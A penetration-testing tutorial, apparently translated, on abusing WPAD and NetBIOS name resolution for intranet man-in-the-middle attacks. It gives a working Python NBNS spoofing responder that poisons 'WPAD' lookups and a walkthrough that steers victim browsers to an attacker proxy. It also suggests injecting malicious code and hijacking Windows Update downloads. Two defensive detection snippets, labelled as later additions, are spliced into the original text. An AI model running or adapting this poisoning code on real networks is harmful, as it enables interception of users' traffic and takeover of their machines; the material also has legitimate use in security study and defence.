Introduction to intranet penetration using NetBIOS protocol name resolution and WPAD
0x00 Preface
WPAD has been around for nearly ten years. Its main advantage is that when users in one or more LANs need different proxy servers to reach the Internet or the corporate intranet, WPAD lets the administrator configure this flexibly and conveniently. Because the proxy configuration is transparent to users and needs no manual steps, attackers can also abuse WPAD for intranet penetration.
Using WPAD for intranet penetration has been known for many years, yet it never became as popular as ARP spoofing and similar attacks. This may be because in conventional intranet penetration, for example against a Windows domain, the attacker only needs to obtain domain administrator privileges to control every machine in the domain, so attackers usually focus only on how to capture the domain administrator's hash. Even in workgroup penetration there are more effective methods than WPAD. Still, when the attacker has run out of tricks ;), some of these "non-mainstream" methods come in handy for intranet penetration.
This article describes how WPAD works, how it is implemented, and how it is applied in intranet penetration. It is only meant to start the discussion, and I hope many of you will pick it apart.
PS: I wrote this article in my spare time, so some omissions are inevitable. I hope the experts will correct me in the comments or by PM.
0x01 WPAD Overview
WPAD is short for the Web Proxy Auto-Discovery Protocol. It lets browsers on a LAN automatically discover proxy servers in the intranet and use the discovered proxy server to connect to the Internet or the corporate intranet. All mainstream browsers support WPAD, and IE has offered automatic proxy discovery and switching since IE 5.0. Apple, however, considers WPAD a security risk, and Safari on OS X 10.10 and later no longer parses PAC files.
How WPAD works
When automatic proxy discovery is enabled, the browser searches the current LAN for a proxy server whenever it is used to access the Internet. If a proxy server is found, a Proxy Auto-Config file is downloaded from it. This file defines which proxy server the user should use when accessing a given URL. The browser downloads and parses the file and sets the corresponding proxy server in the user's browser configuration.
PAC File
The PAC (Proxy Auto-Config) file uses JavaScript to describe which proxy server is used for which URL. It is usually named proxy.pac; when distributed through WPAD, the PAC file is named wpad.dat.
A PAC file defines at least one JavaScript function, FindProxyForURL(url, host). Its return value is a string that specifies how the URL is to be accessed; the two parameters are the URL being requested and the host name of that URL.
An example of the PAC file content is as follows:
```javascript
function FindProxyForURL(url, host) {
    // direct access for one specific URL
    if (url == 'http://Her0in.org/') return 'DIRECT';
    // shell-style wildcard match on the host name
    if (shExpMatch(host, "*.wooyun.org")) return "DIRECT";
    // SOCKS proxy for one host
    if (host == 'wooyun.com') return 'SOCKS 127.1.1.1:8080';
    // HTTP proxy, falling back to direct access if the proxy is unreachable
    if (dnsResolve(host) == '10.0.0.100') return 'PROXY 127.2.2.2:8080; DIRECT';
    return 'DIRECT';
}
```
This file specifies that when a user accesses http://Her0in.org/, the URL is accessed DIRECT, without any proxy server. The shExpMatch function can also be used to match the host or URL. SOCKS 127.1.1.1:8080 means the SOCKS proxy at 127.1.1.1:8080 is used to access the URL. PROXY 127.2.2.2:8080; DIRECT means the HTTP proxy at 127.2.2.2:8080 is used, and if the connection to that proxy fails, the URL is accessed directly.
An HTTP server that provides WPAD locally must listen on port 80, because the client browser downloads the PAC file from port 80 by default. Setting the MIME type of the PAC file to application/x-ns-proxy-autoconfig or application/x-javascript-config is recommended but not required.
Encoding of PAC files
Firefox and IE only support PAC files in the system's default encoding; Unicode encodings such as UTF-8 are not supported. For more information about PAC files, see here and here.
0x02 WPAD in Windows
Windows has supported WPAD since IE 5.0, and it is enabled by default.
You can see this in IE under Internet Options > Connections tab > LAN settings > Automatically detect settings, which is checked by default, as shown in Figure 1:
Figure 1: WPAD settings of IE browser in Windows
In addition, since IE 5.5 Windows supports the "automatic proxy result cache", which is enabled by default. Whenever the client browser successfully connects to an HTTP proxy server, the cache is updated. When the browser next needs a proxy, that is, when FindProxyForURL() would be called again, the cache is checked first to see whether the proxy server address to connect to is already present. The purpose of this cache is to reduce the overhead of repeating the proxy lookup for every connection.
You can disable this function using the following operations:
Method 1: Modify the Registry
The following registry key controls the automatic proxy result cache:
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
Set EnableAutoproxyResultCache (create it manually as a REG_DWORD if it does not exist) to 0 or 1.
0 = disable the cache; 1 = enable the automatic proxy result cache (the default)
Method 2: Modify group policy settings
In the Group Policy Object Editor, go to User Configuration > Administrative Templates > Windows Components > Internet Explorer and enable "Disable caching of Auto-Proxy scripts".
WPAD support for WinHTTP
Windows also has a service named WinHTTP Web Proxy Auto-Discovery Service, described as: "WinHTTP implements the client HTTP stack and provides developers with a Win32 API and COM Automation component for sending HTTP requests and receiving responses. In addition, WinHTTP provides support for auto-discovering a proxy configuration via its implementation of the WPAD protocol."
PS: For security reasons we recommend disabling this service, since most environments do not use it.
0x03 WPAD implementation
WPAD can be implemented in two ways, via DHCP and via DNS, described below.
Use the DHCP server to configure WPAD
DHCP is short for Dynamic Host Configuration Protocol, a network protocol used on LANs. It sits at the OSI application layer and uses UDP as its transport. Its main function is dynamic allocation, not only of IP addresses but also of other parameters such as the subnet mask; this additional information is carried in the "DHCP options" field of the protocol.
The DHCP workflow has four steps, shown in Figure 2:
Figure 2: DHCP workflow
This is the exchange between the client and the DHCP server. The first two steps are broadcasts sent by the client, after which the DHCP server communicates with the client by unicast. The last two steps are how the client obtains the IP address from the DHCP server. If the client has previously obtained an IP address that is still unused by other hosts when it rejoins the network, the first two steps are skipped. The DHCP protocol itself is not the focus of this article.
When DHCP is used to configure WPAD, the protocol exchange changes. RFC 2131 adds the DHCPINFORM message, which a client uses to request local configuration parameters. The client therefore sends a DHCPINFORM request when looking for the WPAD host, and the DHCP server replies with a DHCPACK whose DHCP Options field contains option 252, that is, the address of the PAC file on the WPAD proxy server.
The DHCP structure of the DHCPACK packet returned by the DHCP server is shown in Figure 3:
Figure 3: DHCPACK message structure
For the other DHCP option definitions, refer to the DHCP RFC 1531 document.
In most intranets today DHCP servers are no longer used to configure WPAD on clients; a simpler method, such as a DNS record, is used instead.
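As an added example (not part of the original article), the following Python 3 snippet parses the options field of a DHCP reply and reports whether it carries option 252 and where the PAC URL points, which is how a defender would spot an unexpected server handing out WPAD via DHCP. The DHCPACK bytes, the PAC URL and the allowed host name are constructed placeholders.

```python
import struct
from urllib.parse import urlparse

DHCP_MAGIC = b"\x63\x82\x53\x63"   # magic cookie that starts the options field
OPT_PAD, OPT_MSG_TYPE, OPT_WPAD, OPT_END = 0, 53, 252, 255
MSG_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 5: "ACK", 6: "NAK", 8: "INFORM"}

def parse_dhcp_options(payload):
    """Return {option_code: value_bytes} for a DHCP options field.

    payload starts at the magic cookie (offset 236 of the BOOTP fixed header).
    Pad (0) bytes are skipped; parsing stops at End (255) and rejects truncation.
    """
    if not payload.startswith(DHCP_MAGIC):
        raise ValueError("options field does not start with the DHCP magic cookie")
    options, i = {}, len(DHCP_MAGIC)
    while i < len(payload):
        code = payload[i]
        if code == OPT_PAD:
            i += 1
            continue
        if code == OPT_END:
            break
        if i + 1 >= len(payload):
            raise ValueError("truncated option header")
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("option %d claims %d bytes, %d present" % (code, length, len(value)))
        options[code] = value
        i += 2 + length
    return options

def wpad_url(options):
    """Return the option-252 PAC URL as text, or None if the reply carries none."""
    raw = options.get(OPT_WPAD)
    if raw is None:
        return None
    return raw.rstrip(b"\x00").decode("ascii", "replace")   # some servers NUL-terminate it

def check_wpad(options, allowed_hosts):
    """Return (message_type, pac_url, verdict) for a parsed DHCP reply.

    verdict is 'none' (no option 252), 'ok' (PAC host is on the allow list) or
    'unexpected' (a PAC URL the administrator did not configure, which is what a
    rogue DHCP server distributing WPAD looks like on the wire).
    """
    msg_type = MSG_TYPES.get(options.get(OPT_MSG_TYPE, b"\x00")[0], "UNKNOWN")
    url = wpad_url(options)
    if url is None:
        return msg_type, None, "none"
    host = (urlparse(url).hostname or "").lower()
    return msg_type, url, "ok" if host in allowed_hosts else "unexpected"

# Constructed DHCPACK options (placeholder addresses): type=ACK, option 252, a pad, End.
PAC_URL = b"http://10.0.0.200/wpad.dat"
SAMPLE_ACK_OPTIONS = (DHCP_MAGIC
                      + bytes([OPT_MSG_TYPE, 1, 5])
                      + bytes([OPT_WPAD, len(PAC_URL)]) + PAC_URL
                      + bytes([OPT_PAD, OPT_END]))

if __name__ == "__main__":
    print(check_wpad(parse_dhcp_options(SAMPLE_ACK_OPTIONS), {"wpad.corp.example"}))
```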
Configure WPAD with DNS
Using DNS to configure WPAD relies on the Windows name resolution mechanism.
The principle is as follows:
The client host sends a query for "wpad" plus a suffix to the DNS server. In a domain environment the query name is "wpad." followed by the name of the current domain. The DNS server resolves the WPAD host name and returns the IP address of the WPAD host, and the client downloads and parses the PAC file over port 80 of that address.
With DNS-based WPAD configuration, the network administrator only needs to add a DNS record for the WPAD host to the DNS server.
PS: In a workgroup environment, when the client host performs WPAD discovery it follows the Windows name resolution order with the query name "WPAD". On Vista and later the order is DNS => LLMNR => NBNS; on earlier versions it is DNS => NBNS.
0x04 Using WPAD for Intranet penetration
The preceding sections described how WPAD works and how it is implemented in Windows. Next we focus on how to use WPAD for intranet penetration.
As noted above, DHCP is rarely used for WPAD configuration in the intranets encountered during actual penetration tests. When WPAD is configured via DNS or not configured at all, the Windows name resolution order applies by default. An attacker can therefore exploit the flaws in the Windows name resolution order to push a "malicious" WPAD configuration for intranet penetration.
For details on the Windows name resolution order and how its flaws are exploited, see the following two articles.
Windows Name resolution mechanism and defect utilization (hereinafter referred to as article 1)
Use LLMNR name resolution defects to hijack the specified Intranet host session (hereinafter referred to as article 2)
WPAD-based man-in-the-middle attack using NetBIOS name resolution
Article 2 already explains how to use LLMNR name resolution for intranet penetration and provides the corresponding code, so this article does not repeat how the LLMNR name resolution defect is used for WPAD-based man-in-the-middle attacks.
NetBIOS protocol name parsing process
The figure below shows the NetBIOS name resolution process, taking the victim's access to WEBSERVER on the LAN as an example (the victim's NetBIOS cache does not contain WEBSERVER):
Figure 4: NetBIOS name resolution process
NetBIOS protocol analysis
Wireshark can quickly capture NetBIOS name query packets, for example:
Figure 5: NetBIOS name query data packet format
The NetBIOS packet structure is essentially the same as LLMNR's, with one obvious difference: the host name in NetBIOS is encoded (the "first-level encoding"). The encoding and decoding routines can be found in the source of tools such as dpkt and Wireshark:
PS: the following code is taken from the dpkt library.
```python
import struct

def encode_name(name):
    """Return the NetBIOS first-level encoded name."""
    l = []
    # pad (or truncate) the name to the 16-byte NetBIOS name field
    for c in struct.pack('16s', name):
        c = ord(c)
        # each byte becomes two characters in the range 'A'..'P'
        l.append(chr((c >> 4) + 0x41))
        l.append(chr((c & 0xf) + 0x41))
    return ''.join(l)

def decode_name(nbname):
    """Return the NetBIOS first-level decoded nbname."""
    if len(nbname) != 32:
        return nbname
    l = []
    # rebuild each byte from two encoded characters
    for i in range(0, 32, 2):
        l.append(chr(((ord(nbname[i]) - 0x41) << 4) |
                     ((ord(nbname[i + 1]) - 0x41) & 0xf)))
    # drop the NUL padding added by struct.pack('16s', ...)
    return ''.join(l).split('\x00', 1)[0]
```
The encoding and decoding are easy to follow from the code. For why the name is packed into 16 bytes, see the description of NetBIOS names in article 1.
The NetBIOS protocol covers a lot of ground, much of it directly related to commands we use in intranet penetration. For details, refer to the NetBIOS RFC documents.
Querying and responding to NetBIOS protocol in Python
Although excellent open-source network protocol libraries already support NetBIOS queries and responses, building the packets ourselves gives a better understanding of the protocol. Based on the packets captured with Wireshark (Figure 5), a NetBIOS name query packet can be constructed quickly. The code is as follows:
```python
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
__doc__ = """NBNS Query, by Her0in"""
import socket, struct, time

class NBNS_Query:
    def __init__(self, name):
        self.name = name
        self.populate()

    def populate(self):
        self.HOST = '192.168.16.255'   # broadcast address of the local subnet
        self.PORT = 137                # NetBIOS Name Service
        self.nqs = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.queryData = (
            "\xa9\xfb"    # Transaction ID
            "\x01\x10"    # Flags: query, recursion desired, broadcast
            "\x00\x01"    # Questions: 1
            "\x00\x00"    # Answer RRs
            "\x00\x00"    # Authority RRs
            "\x00\x00"    # Additional RRs
            "\x20"        # length of Name: 32
            "NAME"        # Name (placeholder, replaced below)
            "\x00"        # Name terminator
            "\x00\x20"    # Query Type: NB
            "\x00\x01")   # Class: IN
        self.data = self.queryData.replace(
            'NAME', struct.pack("32s", self.encode_name(self.name)))

    # From http://code.google.com/p/dpkt/
    def encode_name(self, name):
        """Return the NetBIOS first-level encoded name."""
        l = []
        for c in struct.pack('16s', name):
            c = ord(c)
            l.append(chr((c >> 4) + 0x41))
            l.append(chr((c & 0xf) + 0x41))
        return ''.join(l)

    def Query(self):
        while 1:
            print "NBNS Querying... -> %s" % self.name
            self.nqs.sendto(self.data, (self.HOST, self.PORT))
            time.sleep(1)   # one query per second instead of flooding the segment
        self.nqs.close()

if __name__ == "__main__":
    nbns = NBNS_Query("WPAD")
    nbns.Query()
```
Capturing the NetBIOS name query response with Wireshark makes it equally quick to implement the response side. The code is as follows:
```python
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
__doc__ = """NBNS Answer, by Her0in"""
import socket, struct

class NBNS_Answer:
    def __init__(self, addr):
        self.IPADDR = addr     # address placed in every answer
        self.nas = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.init_socket()
        self.populate()

    def populate(self):
        self.answerData = (
            "TID"               # Transaction ID (placeholder, copied from the query)
            "\x85\x00"          # Flags: response, authoritative answer, recursion desired
            "\x00\x00"          # Questions: 0
            "\x00\x01"          # Answer RRs: 1
            "\x00\x00"          # Authority RRs
            "\x00\x00"          # Additional RRs
            "\x20"              # length of Name: 32
            "NAME"              # Name (placeholder, copied from the query)
            "\x00"              # Name terminator
            "\x00\x20"          # Type: NB
            "\x00\x01"          # Class: IN
            "\x00\x00\x00\xa5"  # TTL
            "\x00\x06"          # Data length: 6
            "\x00\x00"          # NB flags: B-node, unique name
            "IPADDR")           # IP Address (placeholder)

    def init_socket(self):
        self.HOST = "0.0.0.0"
        self.PORT = 137
        self.nas.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.nas.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)

    # From http://code.google.com/p/dpkt/
    def decode_name(self, nbname):
        """Return the NetBIOS first-level decoded nbname."""
        if len(nbname) != 32:
            return nbname
        l = []
        for i in range(0, 32, 2):
            l.append(chr(((ord(nbname[i]) - 0x41) << 4) |
                         ((ord(nbname[i + 1]) - 0x41) & 0xf)))
        return ''.join(l).split('\x00', 1)[0]

    def Answer(self):
        self.nas.bind((self.HOST, self.PORT))
        print "Listening..."
        while 1:
            data, addr = self.nas.recvfrom(1024)
            tid = data[0:2]      # Transaction ID: first two bytes of the query
            name = data[13:45]   # 32-byte encoded name after the 12-byte header and length byte
            data = self.answerData.replace('TID', tid)
            data = data.replace('NAME', name)
            data = data.replace('IPADDR', socket.inet_aton(self.IPADDR))
            print "Poisoned answer (%s) sent to %s for name %s" % (
                self.IPADDR, addr[0], self.decode_name(name))
            self.nas.sendto(data, addr)
        self.nas.close()

if __name__ == "__main__":
    nbns = NBNS_Answer("11.22.33.44")
    nbns.Answer()
```
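As an added example (not code from the original article), the following Python 3 snippet does the defender's side of what the two programs above do: it parses NBNS packets with the same layout, decodes the first-level encoded name the way the dpkt routines do, and flags positive answers for the name WPAD that come from an address not on the administrator's allow list. The two packets and all addresses are constructed, not captured.

```python
import socket
import struct

NBNS_HDR = struct.Struct("!HHHHHH")   # TID, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT
TYPE_NB = 0x0020                      # NB resource record (name -> IP address)

def decode_first_level(encoded):
    """Undo NetBIOS first-level encoding: 32 bytes in 'A'..'P' -> 16 raw bytes.

    Returns (name, suffix): the 15-character name with padding stripped and the
    16th byte, which identifies the service type (0x00 = workstation).
    """
    if len(encoded) != 32 or any(not 0x41 <= b <= 0x50 for b in encoded):
        raise ValueError("not a first-level encoded NetBIOS name")
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].rstrip(b" \x00").decode("latin-1"), raw[15]

def parse_nbns(packet):
    """Parse one NBNS query or answer (single question / single NB answer layout)."""
    tid, flags, qd, an, ns, ar = NBNS_HDR.unpack_from(packet, 0)
    if packet[12] != 0x20:                       # label length byte must be 32
        raise ValueError("unexpected NetBIOS name label length")
    name, suffix = decode_first_level(packet[13:45])
    rtype, rclass = struct.unpack_from("!HH", packet, 46)   # after the 0x00 terminator
    rec = {"tid": tid, "is_response": bool(flags & 0x8000), "name": name,
           "suffix": suffix, "type": rtype, "addresses": []}
    if rec["is_response"] and an:
        ttl, rdlen = struct.unpack_from("!IH", packet, 50)
        rdata = packet[56:56 + rdlen]
        # each NB entry is 2 bytes of NB flags followed by a 4-byte IPv4 address
        rec["addresses"] = [socket.inet_ntoa(rdata[i + 2:i + 6]) for i in range(0, rdlen, 6)]
    return rec

def flag_wpad_poisoning(packets, known_wpad_hosts=()):
    """Return (source, tid, addresses) for NB answers claiming WPAD from unlisted hosts."""
    alerts = []
    for src, pkt in packets:
        rec = parse_nbns(pkt)
        if rec["is_response"] and rec["type"] == TYPE_NB and rec["name"].upper() == "WPAD":
            bad = [a for a in rec["addresses"] if a not in known_wpad_hosts]
            if bad:
                alerts.append((src, rec["tid"], bad))
    return alerts

# Constructed packets (placeholder addresses): "WPAD" padded with spaces, suffix 0x00,
# first-level encoded exactly as the dpkt routine would produce it.
WPAD_ENCODED = b"FHFAEBEE" + b"CA" * 11 + b"AA"

def _nb_packet(tid, flags, counts):
    return (NBNS_HDR.pack(tid, flags, *counts) + b"\x20" + WPAD_ENCODED + b"\x00"
            + struct.pack("!HH", TYPE_NB, 1))

SAMPLE_QUERY = _nb_packet(0xa9fb, 0x0110, (1, 0, 0, 0))            # broadcast query
SAMPLE_ANSWER = (_nb_packet(0xa9fb, 0x8500, (0, 1, 0, 0))          # positive answer
                 + struct.pack("!IH", 0xa5, 6) + b"\x00\x00" + socket.inet_aton("10.0.0.99"))
CAPTURE = [("192.168.16.23", SAMPLE_QUERY), ("192.168.16.77", SAMPLE_ANSWER)]

if __name__ == "__main__":
    for alert in flag_wpad_poisoning(CAPTURE):
        print("NBNS answer for WPAD from %s (tid 0x%04x) -> %s" % alert)
```

In a workgroup without a legitimate WPAD host, any positive NB answer for this name is worth an alert, so the allow list can simply be left empty.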
Ideas for WPAD-based man-in-the-middle attacks using NetBIOS name resolution
After the above discussion of how WPAD and the NetBIOS protocol work, the idea behind WPAD-based man-in-the-middle attacks via NetBIOS name resolution is easy to grasp, so I will not go into as much detail as article 2 did. In my opinion, once the attack idea is understood, how to apply it is a question of "methodology" that you can adapt to the situation at hand.
WPAD-based man-in-the-middle attacks via NetBIOS name resolution essentially exploit the Windows name resolution order and the NetBIOS protocol.
As mentioned in section 0x03, when a client in a workgroup performs WPAD discovery it follows the Windows name resolution order with the query name "WPAD". The attacker answers for the "WPAD" name by listening on port 137 and waits for other hosts on the LAN with WPAD enabled to start IE and connect to the network. The victim's browser proxy is then set to the proxy server specified by the attacker, and the victim's browsing history can be observed.
A simple attack scenario can be simulated quickly with the demo programs from the previous section, Python's SimpleHTTPServer, and an HTTP or SOCKS proxy server. For example:
Figure 6: WPAD-based man-in-the-middle attack using NetBIOS name resolution
As shown in Figure 6, the attacker runs the malicious NetBIOS response program and listens on port 80 to serve the PAC file (wpad.dat), which points to the HTTP proxy server (Burp Suite).
The victim host (Windows XP) opens IE (with WPAD enabled) and starts browsing. The browser looks for a proxy server on the current LAN, that is, it queries the WPAD name. The attacker's malicious response program answers it, and the HTTP server that serves the PAC file logs the download, so at this point the victim's browser has fetched the PAC file (whose content is the proxy server address). From then on the victim's browser uses the attacker-specified proxy server to access the Internet, as can be seen in Burp Suite.
That is the whole attack idea and process. In practice it can be scripted and automated.
0x05 Summary
There are many more ways to conduct man-in-the-middle attacks with the NetBIOS protocol, and the attack ideas can be adapted to the situation. When WPAD is used for attacks, the results may not be as good as imagined, but once the attack works, the victim host's privileges can be obtained, so it is worth a try, especially when nothing else is available. In many intranets administrators do not defend against these attacks at all; apart from some desktop security products, such as a firewall that filters and intercepts strictly, this kind of attack is very effective in most cases. In particular, the attacker can filter victim hosts at name-resolution time and modify HTTP packets to insert malicious code for targeted attacks. NetBIOS also has an advantage over LLMNR: NetBIOS name resolution can answer for the domain name the victim is accessing, although NetBIOS is only queried when the DNS server does not respond successfully. Combined with WPAD, this can be used for a man-in-the-middle attack on the update domain used by Windows Update, making the victim download and execute patch files specified by the attacker.
For details about the NetBIOS protocol, refer to the RFC documents. There is much more in it that can be used in intranet penetration, such as the values of the OPCODE field and the BROWSER protocol; more attack ideas will follow.